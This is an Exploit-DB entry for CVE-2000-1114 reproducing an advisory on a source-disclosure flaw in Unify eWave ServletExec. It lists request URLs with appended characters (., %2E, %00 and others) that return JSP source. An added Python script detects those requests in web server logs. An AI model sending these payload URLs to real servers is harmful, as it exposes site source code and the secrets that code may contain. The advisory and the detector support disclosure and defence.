- 18 Dec 2022
- EDB-ID: 20412
- EDB Verified: Passed
- Author: WOJCIECH WOCH
- Vulnerability type: REMOTE
- Platform: JSP
- CVE: CVE-2000-1114
- Published: 2000-11-21
Code:
source: https://www.securityfocus.com/bid/1970/info
Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc.
ServletExec will return the source code of JSP files when one of the following characters is appended to an HTTP request:
.
%2E
+
%2B
%5C
%20
%00
For example, the following URL will yield the source of the specified JSP file:
http://target/directory/jsp/file.jsp.
Successful exploitation could lead to the disclosure of sensitive information contained within JSP pages.
Any of the following URL requests will yield the source of the specified JSP file:
http://target/directory/jsp/file.jsp.
http://target/directory/jsp/file.jsp%2E
http://target/directory/jsp/file.jsp+
http://target/directory/jsp/file.jsp%2B
http://target/directory/jsp/file.jsp\
http://target/directory/jsp/file.jsp%5C
http://target/directory/jsp/file.jsp%20
http://target/directory/jsp/file.jsp%00
- Source: www.exploit-db.com
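A log check for the request shapes listed above, as an added example that is not part of the original advisory or the Exploit-DB entry: it flags request paths that end in .jsp followed by any of the listed characters. The Common Log Format layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re

# Trailing sequences listed in the advisory, matched on the raw (undecoded) path.
TRAILERS = r"(?:\.|\+|\\|%2e|%2b|%5c|%20|%00)"
SUSPECT = re.compile(r"\.jsp" + TRAILERS + r"+$", re.IGNORECASE)
# Request and status fields of a Common Log Format line (assumed log layout).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def suspicious_path(target):
    """True if the path part of a request target ends in .jsp plus a listed trailer."""
    path = target.split("?", 1)[0].split("#", 1)[0]  # ignore query string and fragment
    return bool(SUSPECT.search(path))


def scan(lines):
    """Return (client, target, status) for every log line whose path matches."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and suspicious_path(m.group("target")):
            client = line.split(" ", 1)[0]
            hits.append((client, m.group("target"), int(m.group("status"))))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/Nov/2000:10:00:01 +0000] "GET /directory/jsp/file.jsp HTTP/1.0" 200 512',
    '192.0.2.11 - - [21/Nov/2000:10:00:02 +0000] "GET /directory/jsp/file.jsp. HTTP/1.0" 200 2048',
    '192.0.2.11 - - [21/Nov/2000:10:00:03 +0000] "GET /directory/jsp/file.jsp%2e HTTP/1.0" 200 2048',
    '192.0.2.12 - - [21/Nov/2000:10:00:04 +0000] "GET /directory/jsp/file.jsp%00 HTTP/1.0" 404 0',
    '192.0.2.13 - - [21/Nov/2000:10:00:05 +0000] "GET /directory/jsp/file.jsp?q=a+b HTTP/1.0" 200 512',
    '192.0.2.14 - - [21/Nov/2000:10:00:06 +0000] "GET /docs/readme.txt. HTTP/1.0" 200 100',
]

if __name__ == "__main__":
    for client, target, status in scan(SAMPLE_LOG):
        print(client, target, status)
```

Matching is done on the undecoded path so that the encoded forms (%2E, %2B, %5C, %20, %00) are caught as written in the log; query strings are excluded so that an ordinary `+` in a parameter does not trigger a hit.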